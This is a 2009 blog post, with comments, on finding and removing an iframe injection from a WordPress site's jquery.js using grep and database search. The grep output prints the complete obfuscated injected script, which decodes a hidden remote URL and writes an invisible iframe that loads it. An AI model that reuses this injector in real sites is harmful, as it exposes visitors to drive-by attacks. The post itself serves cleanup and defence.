Finding & Removing malicious iframe exploit from WordPress

Sometime back our one under-construction site was infected with iframe injection in its wordpress theme. As it was not live site, I didn’t care much. Today, my friend Federico’s company site – Helios Design was infected with the same exploit.

First… About the iframe exploit!

This exploit injected some malicious code into wordpress’s “wp-includes/js/jquery/jquery.js” file, highlighted in the following screenshot.

Iframe injection in jquery.js - WordPress Security Issue-1

When compared to original wordpress file – http://svn.automattic.com/wordpress/tags/2.8.4/wp-includes/js/jquery/jquery.js, you can see some extra code was added at the top.

As a result, at runtime an iframe gets created which was executing a remote script. It also broke sites markup resulting in bad SEO and failed validation. Such exploits can further act as a ground to launch bigger attacks or may infect visitor’s computer.

If Google visits your site with such codes, your site may get blocked in browsers like Firefox, Chrome and Safari. In those cases, your visitor will get a big security alert when they attempt to visit your site.

How-To fix this…

Find the exact codes that are inserted in your theme. In my friend’s case, following codes were injected:

iframe codes in theme-2

Now searching for “src” link wont be good idea. The guy who can inject above codes into wordpress (via third-party codes most probably) will not store its src URL in plain-text. Also, rather than searching for complete code, its better to search different parts.

In this case – I decided to search “uKUwc”,Β  “xblacnknet.cn” and “kDaxV” separately.

As far as searching is concerned there are 2 places to search – database and filesystem.

For database search you can use – phyMyAdmin. If you don’t have phpMyAdmin, just install WP-phpMyAdmin plugin.

To search filesystem – open shell to your server and execute grep command like below:

grep -H -r "kDaxV" /path/to/wp-root-dir

Substitute “/path/to/wp-root-dir” with filesystem path to the directory where wordpress is installed. “kDaxV” is a search string. Try different search strings unless u get any result. “-r” forces grep to search recursively and “-H” make it print filenames. Above command will perform search inside file contents.

For more details on this command refer this article by Vivek Gite.

Executing above command resulted in following output:

./wp-includes/js/jquery/jquery.js:var/**/YFiXz/**/=/**/document;function/**/ugGMs(czlmZ){/**/var/**/cZdbo/**/=/**/””,/**/aujtC/**/=/**/0;for/**/(aujtC=czlmZ.length-1;aujtC>=0;aujtC–){cZdbo/**/+=/**/czlmZ.charAt(aujtC);}/**/return/**/cZdbo;}function/**/xHiRm(UbqcV){UbqcV/**/=/**/UbqcV.replace(/[.]/g,/**/”%”);UbqcV/**/=/**/unescape(UbqcV);return/**/ugGMs(UbqcV);}function/**/WDxZS(){document.write(“<style>.kDaxV{width:0%;height:0%;border:none;}</style>”);var/**/KJKbL/**/=/**/”<iframe/**/name=”3″ id=”uKUwc” src=”$” class=”kDaxV”></iframe>”;var/**/Xqvgy/**/=/**/KJKbL.replace(/[+$]/g,/**/xHiRm(“.69.67.63.2e.76.2f.76.2f.6e.69.62.2d.69.67.63.2f.6e.63.2e.74.65.6e.6b.63.61.6c.62.78.2f.2f.3a.70.74.74.68”));return/**/Xqvgy;}YFiXz.writeln(WDxZS());

Once you find exact file, either you can remove malicious codes from it or replace that file with original version form wordpress repo.

Hope this helps someone out there! πŸ™‚

8 Comments

Federico Moreno December 8, 2009

That saved my day and definitely more. Very useful information Rahul πŸ™‚

Arjun S Kumar December 8, 2009

I think OrkutBuddy was infected the same way. It could have know then before we moved to some other script..

πŸ™

de Paulus December 8, 2009

Thanks for this useful info, but do you know HOW this is injected into a page, and how to prevent it?.

Rahul Bansal December 8, 2009

@Federico
Glad to see a comment from one of the best designer out there! πŸ˜‰

@Arjun
If for that reason you moved away from wordpress, then I really feel bad for not giving enough time for OrkutBuddy.

@de Paulus
Its hard to determine HOW this entered into system.
Had it happened on a site that I’m monitoring in my daily routine, I could check server logs and few more things.
In this particular case, I am not sure WHEN this happened.

Still, I think it must be a hole in a wordpress plugin as I trust wordpress core and Federico being a designer himself creates his own wordpress themes.

de Paulus December 8, 2009

The reason I asked, is because last year ix web hosting had a big issue with “Server Side” security issues, and EVERY page hosted on ceratin servers got injected with this IFrame, and it happened EVERY 10 days.. this went on for almost 10 months.. Also at the same time, the .htaccess file was re-written to divert traffic to a bogus anti virus site.. and because it was “Server Side” there was NOTHING the user could do, except re-upping the files every 10 days.. There is a website about this, can’t remember the address, but if you google IX Webhost Warning you will find it.

I agree that Fredrico is one of the Best Template Designers, I follow him on Theme Forest, and luv his Templates.

Tech-Freak Stuff December 31, 2009

There have been other problems like encrypted code in WordPress themes too. They can also cause severe problems

Ankit Puri March 18, 2010

thank you for the trick

Elisabetta January 9, 2012

I am having exactly the same issue with my website at the moment. The problem is that I have been cleaning the site over and over and within about a day it gets infected again.

Every time I clean the site I get confirmation by my hosting provider that my site is clean, but after a while the iFrame trojan raises its ugly head again.

So beside cleaning, is there a way to preven this from recurring?